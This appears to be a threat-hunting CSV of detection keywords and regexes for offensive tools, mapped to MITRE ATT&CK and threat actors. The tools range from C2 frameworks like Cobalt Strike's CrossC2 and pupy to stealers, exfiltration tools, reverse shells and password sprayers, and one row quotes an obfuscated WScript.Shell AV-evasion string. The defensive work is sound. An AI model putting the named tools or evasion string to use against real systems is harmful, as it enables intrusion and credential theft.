"* crde_arm_musl https -*",".{0,1000}\scrde_arm_musl\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","714"
"* crde_armv7 https -*",".{0,1000}\scrde_armv7\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","715"
"* crde_debug https -*",".{0,1000}\scrde_debug\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","716"
"* crde_linux https -*",".{0,1000}\scrde_linux\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","#linux","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","717"
"* crde_linux_aarch64 https -*",".{0,1000}\scrde_linux_aarch64\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","#linux","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","718"
"* crde_linux_x86_64 https -*",".{0,1000}\scrde_linux_x86_64\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","#linux","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","719"
"* crde_macos https -*",".{0,1000}\scrde_macos\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","720"
"* crde_release https -*",".{0,1000}\scrde_release\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","721"
"* crde_windows https -*",".{0,1000}\scrde_windows\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","722"
"* crde_windows_x64 https -*",".{0,1000}\scrde_windows_x64\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","723"
"* crde_windows_x86 https -*",".{0,1000}\scrde_windows_x86\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","724"
"* Create-HotKeyLNK.ps1*",".{0,1000}\sCreate\-HotKeyLNK\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","727"
"* CreateObject(""W""+""S""+""cr""+""ip""+""t.""+""S""+""h""+""e""+""l""+""l"")*",".{0,1000}\sCreateObject\(\""W\""\+\""S\""\+\""cr\""\+\""ip\""\+\""t\.\""\+\""S\""\+\""h\""\+\""e\""\+\""l\""\+\""l\""\).{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","download cradles to bypass AV/EPP/EDR in context of download cradle detections","T1105 - T1027 - T1203 - T1071","TA0005 - TA0009 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","0","N/A","N/A","10","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","728"
"* createproxydll.sh*",".{0,1000}\screateproxydll\.sh.{0,1000}","offensive_tool_keyword","nimproxydll","A Docker container for byt3bl33d3r/NimDllSideload - DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/cyllective/nimproxydll","1","0","N/A","N/A","9","1","10","0","2024-05-26T17:34:01Z","2024-03-15T15:15:45Z","729"
"* --createpub -n 7828374823761928712873129873981723...12837182 -e 65537*",".{0,1000}\s\-\-createpub\s\-n\s7828374823761928712873129873981723\.\.\.12837182\s\-e\s65537.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","730"
"* Cred_Dump.sh*",".{0,1000}\sCred_Dump\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","N/A","10","8","707","112","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z","731"
"* creddump.py*",".{0,1000}\screddump\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","732"
"* credentials /pvk:*",".{0,1000}\scredentials\s\/pvk\:.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","733"
"* credmaster.py*",".{0,1000}\scredmaster\.py.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","N/A","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","734"
"* credmaster-success.txt*",".{0,1000}\scredmaster\-success\.txt.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","N/A","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","735"
"* credmaster-validusers.txt*",".{0,1000}\scredmaster\-validusers\.txt.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","N/A","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","736"
"* creds-summary.nse*",".{0,1000}\screds\-summary\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","737"
"* CRITICAL] Suspicous file: \\*",".{0,1000}\sCRITICAL\]\sSuspicous\sfile\:\s\\\\.{0,1000}","offensive_tool_keyword","smbscan","SMBScan is a tool to enumerate file shares on an internal network.","T1135 - T1046 - T1021","TA0007 - TA0043 - TA0008","N/A","APT22","Discovery","https://github.com/jeffhacks/smbscan","1","0","N/A","N/A","8","1","44","6","2025-03-24T01:55:30Z","2021-10-26T02:28:34Z","738"
"*- Cronos rootkit debugger -*",".{0,1000}\-\sCronos\srootkit\sdebugger\s\-.{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","0","N/A","N/A","N/A","9","899","186","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z","740"
"* CrossC2 Listener*",".{0,1000}\sCrossC2\sListener.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/gloxec/CrossC2","1","0","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","741"
"* CrossC2.*",".{0,1000}\sCrossC2\..{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/gloxec/CrossC2","1","0","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","742"
"* CrossC2Kit *",".{0,1000}\sCrossC2Kit\s.{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CrossC2/CrossC2Kit","1","0","N/A","N/A","10","10","218","37","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z","743"
"* CSExec.py*",".{0,1000}\sCSExec\.py.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","N/A","private github repo","10","","N/A","","","","744"
"* -CShardDLLBytes*",".{0,1000}\s\-CShardDLLBytes.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","745"
"* cstealer.py*",".{0,1000}\scstealer\.py.{0,1000}","offensive_tool_keyword","cstealer","stealer discord token grabber, crypto wallet stealer, cookie stealer, password stealer, file stealer etc. app written in Python.","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/can-kat/cstealer","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","747"
"* ctfr.py*",".{0,1000}ctfr\.py.{0,1000}","offensive_tool_keyword","ctfr","Abusing Certificate Transparency logs for getting HTTPS websites subdomains.","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0010","N/A","N/A","Reconnaissance","https://github.com/UnaPibaGeek/ctfr","1","0","N/A","N/A","N/A","10","2015","297","2024-01-02T17:19:37Z","2018-03-06T01:14:28Z","748"
"* cups-info.nse*",".{0,1000}\scups\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","749"
"* cups-queue-info.nse*",".{0,1000}\scups\-queue\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","750"
"* curlshell.py*",".{0,1000}\scurlshell\.py.{0,1000}","offensive_tool_keyword","curlshell","reverse shell using curl","T1572","TA0002 - TA0011","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","#linux","N/A","10","10","454","73","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z","751"
"* cursorinit.vbs*",".{0,1000}\scursorinit\.vbs.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","N/A","10","1","N/A","N/A","N/A","N/A","752"
"* --custom_user_agent*",".{0,1000}\s\-\-custom_user_agent.{0,1000}","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","0","N/A","N/A","N/A","4","348","58","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z","753"
"* --custom-steal",".{0,1000}\s\-\-custom\-steal","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","N/A","10","5","488","89","2024-06-08T21:03:50Z","2020-09-20T18:22:36Z","754"
"* --custom-steal listusers*",".{0,1000}\s\-\-custom\-steal\slistusers.{0,1000}","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","N/A","10","5","488","89","2024-06-08T21:03:50Z","2020-09-20T18:22:36Z","755"
"* --custom-steal onedrive*",".{0,1000}\s\-\-custom\-steal\sonedrive.{0,1000}","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","N/A","10","5","488","89","2024-06-08T21:03:50Z","2020-09-20T18:22:36Z","756"
"* --custom-steal onenote*",".{0,1000}\s\-\-custom\-steal\sonenote.{0,1000}","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","N/A","10","5","488","89","2024-06-08T21:03:50Z","2020-09-20T18:22:36Z","757"
"* --custom-steal outlook*",".{0,1000}\s\-\-custom\-steal\soutlook.{0,1000}","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","N/A","10","5","488","89","2024-06-08T21:03:50Z","2020-09-20T18:22:36Z","758"
"* --cve=* --command*",".{0,1000}\s\-\-cve\=.{0,1000}\s\-\-command.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/pwntester/ysoserial.net","1","0","N/A","N/A","10","10","3385","493","2024-12-23T20:59:47Z","2017-09-18T17:48:08Z","759"
"* CVE-2023-38831-RaRCE*",".{0,1000}\sCVE\-2023\-38831\-RaRCE.{0,1000}","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","0","N/A","N/A","9","2","115","18","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z","760"
"* cvs-brute.nse*",".{0,1000}\scvs\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","761"
"* cvs-brute-repository.nse*",".{0,1000}\scvs\-brute\-repository\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","762"
"* -d * -dc * -nu 'neo4j' -np *",".{0,1000}\s\-d\s.{0,1000}\s\-dc\s.{0,1000}\s\-nu\s\'neo4j\'\s\-np\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","763"
"* -d * -n * -m reverse*=",".{0,1000}\s\-d\s.{0,1000}\s\-n\s.{0,1000}\s\-m\sreverse.{0,1000}\=","offensive_tool_keyword","InvisibilityCloak","Proof-of-concept obfuscation toolkit for C# post-exploitation tools","T1027 - T1059.003 - T1140 - T1107","TA0004 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/h4wkst3r/InvisibilityCloak","1","0","N/A","N/A","N/A","6","540","181","2022-07-22T14:13:53Z","2021-05-19T14:19:49Z","764"
"* -d * -n * -m rot13*",".{0,1000}\s\-d\s.{0,1000}\s\-n\s.{0,1000}\s\-m\srot13.{0,1000}","offensive_tool_keyword","InvisibilityCloak","Proof-of-concept obfuscation toolkit for C# post-exploitation tools","T1027 - T1059.003 - T1140 - T1107","TA0004 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/h4wkst3r/InvisibilityCloak","1","0","N/A","N/A","N/A","6","540","181","2022-07-22T14:13:53Z","2021-05-19T14:19:49Z","765"
"* -d * -t axfr >*",".{0,1000}\s\-d\s.{0,1000}\s\-t\saxfr\s\>.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","766"
